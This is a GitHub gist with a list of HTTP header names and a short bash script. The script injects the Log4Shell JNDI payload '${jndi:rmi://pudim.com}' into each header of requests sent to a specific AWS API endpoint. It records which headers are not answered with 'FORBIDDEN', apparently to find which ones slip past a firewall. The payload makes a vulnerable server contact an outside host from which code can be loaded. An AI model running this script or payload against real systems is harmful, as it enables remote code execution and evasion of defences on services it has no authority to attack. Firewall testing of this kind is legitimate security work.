Skip to content

Instantly share code, notes, and snippets.

@6a6f6a6f

6a6f6a6f/headers.txt

Created December 13, 2021 23:31
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save 6a6f6a6f/d1f87c994ecd052605f25061e99e829c to your computer and use it in GitHub Desktop.
Save 6a6f6a6f/d1f87c994ecd052605f25061e99e829c to your computer and use it in GitHub Desktop.
Download ZIP
Raw
headers.txt
Referer
X-Api-Version
Accept-Charset
Accept-Datetime
Accept-Encoding
Accept-Language
Cookie
Forwarded
Forwarded-For
Forwarded-For-Ip
Forwarded-Proto
From
TE
True-Client-IP
Upgrade
User-Agent
Via
Warning
X-Api-Version
Max-Forwards
Origin
Pragma
DNT
Cache-Control
X-Att-Deviceid
X-ATT-DeviceId
X-Correlation-ID
X-Csrf-Token
X-CSRFToken
X-Do-Not-Track
X-Foo
X-Foo-Bar
X-Forwarded
X-Forwarded-By
X-Forwarded-For
X-Forwarded-For-Original
X-Forwarded-Host
X-Forwarded-Port
X-Forwarded-Proto
X-Forwarded-Protocol
X-Forwarded-Scheme
X-Forwarded-Server
X-Forwarded-Ssl
X-Forwarder-For
X-Forward-For
X-Forward-Proto
X-Frame-Options
X-From
X-Geoip-Country
X-Http-Destinationurl
X-Http-Host-Override
X-Http-Method
X-Http-Path-Override
X-Https
X-Htx-Agent
X-Hub-Signature
X-If-Unmodified-Since
X-Imbo-Test-Config
X-Insight
X-Ip
X-Ip-Trail
X-ProxyUser-Ip
X-Requested-With
X-Request-ID
X-UIDH
X-Wap-Profile
X-XSRF-TOKEN
Raw
req.sh
#! /usr/bin/env bash
while IFS="" read -r HEADER || [ -n "$HEADER" ]; do
RESPONSE=$(
curl --silent "https://8i17duelvl.execute-api.us-east-1.amazonaws.com/dev/pets" \
-H "$HEADER: \${jndi:rmi://pudim.com}" \
-H "Content-Type: application/json"
)
PATTERN='FORBIDDEN'
if [[ "$RESPONSE" == *"$PATTERN"* ]]; then
echo "[+] Header $HEADER is blocked!"
else
echo "[!] Header $HEADER passed!"
fi
done <headers.txt
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment